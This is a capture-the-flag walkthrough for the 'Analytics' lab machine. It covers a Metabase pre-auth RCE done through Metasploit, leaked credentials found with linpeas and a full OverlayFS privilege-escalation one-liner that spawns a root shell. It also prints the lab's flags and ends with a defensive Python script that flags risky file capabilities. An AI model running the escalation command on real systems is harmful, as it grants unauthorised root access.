This is my walkthrough on Analytics

First we scan the machine.

nmap -T4 -Pn -v 10.129.85.38

We see ports 22 and 80 open.

Browsing to the website gives an error, so we add the IP and domain to the hosts file.

Now going back to the website we can look around!

Looking around, we see the Login page at the top. Checking that out, it doesn’t work BUT the URL has changed to data.analytical.htb, so let’s add that to the hosts file as well.

When looking we see it’s running Metabase.

Search for Metabase exploits on Google as well as in Metasploit. I find this blog post, “Chaining our way to Pre-Auth RCE in Metabase (CVE-2023-38646)”.

In Metasploit we see a potential exploit

Let’s check the options and set them

Send the exploit….

We have a shell! Now let’s see if we can get and run linpeas.

We can! Run it!

We see in the “Environment” section, a user and a password

META_USER=metalytics
META_PASS=An4lytics_ds20223#

Let’s ssh into the machine with the newly discovered username and password.

ssh metalytics@10.129.85.38

Got the user flag! 5f24e4536b318d506fe1a38fbbd959fa

Priv Escalation

I saw we were running Ubuntu 22.04.3 as we logged in.

A simple Google search for “Ubuntu 22.04.3 priv escalation” shows me this Reddit post about Ubuntu Local Privilege Escalation (CVE-2023-2640 & CVE-2023-32629), with multiple references. It shows how you can get root using the OverlayFS module with this command:

unshare -rm sh -c "mkdir 1 u w m && cp /u*/b*/p*3 1/; setcap cap_setuid+eip 1/python3;mount -t overlay overlay -o rw,lowerdir=1,upperdir=u,workdir=w, m && touch m/*;" && u/python3 -c 'import pty; import os;os.setuid(0); pty.spawn("/bin/bash")'

We have root! f35c47aac97cb1a6b5450d4eb024a3cc
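The command above leaves a copy of python3 carrying cap_setuid in the upper directory u, which is something a defender can hunt for. The following is an added example, not part of the original walkthrough: it parses the output of `getcap -r /` and flags dangerous file capabilities on interpreters or outside packaged paths. The capability list, trusted prefixes and sample lines are assumptions chosen for illustration.

```python
import re

# Capabilities that allow changing identity or bypassing file permission checks.
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override"}
# Assumption: packaged binaries with file capabilities live under these prefixes.
TRUSTED_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/usr/lib/", "/bin/", "/sbin/")
INTERPRETER = re.compile(r"^(python|perl|ruby|php|node)[\d.]*$")
# Accepts both getcap layouts: "path cap_x=ep" and the older "path = cap_x+ep".
LINE = re.compile(r"^(?P<path>.+?) (?:= )?(?P<caps>cap_\S+(?: cap_\S+)*)$")
CLAUSE = re.compile(r"^(?P<names>[a-z0-9_,]+)[=+](?P<flags>[eip]+)$")

def parse_line(line):
    """Return (path, capabilities in the file's permitted set) or None."""
    m = LINE.match(line.strip())
    if not m:
        return None
    permitted = set()
    for clause in m.group("caps").split():
        c = CLAUSE.match(clause)
        if c and "p" in c.group("flags"):
            permitted.update(c.group("names").split(","))
    return m.group("path"), permitted

def audit(getcap_output):
    """Return (path, risky_caps, outside_trusted_path, is_interpreter) findings."""
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_line(line)
        if not parsed:
            continue
        path, caps = parsed
        risky = sorted(caps & DANGEROUS)
        outside = not path.startswith(TRUSTED_PREFIXES)
        interp = bool(INTERPRETER.match(path.rsplit("/", 1)[-1]))
        if risky and (outside or interp):
            findings.append((path, risky, outside, interp))
    return findings

# Constructed sample of `getcap -r / 2>/dev/null` output, not taken from the box.
SAMPLE = """\
/usr/bin/ping cap_net_raw=ep
/home/metalytics/u/python3 cap_setuid=eip
/usr/bin/python3.10 = cap_setuid+ep
/tmp/work dir/helper cap_dac_override,cap_net_admin=ep
"""

if __name__ == "__main__":
    print(*audit(SAMPLE), sep="\n")
```

Feed it real output with `audit(subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True).stdout)` and review every finding by hand.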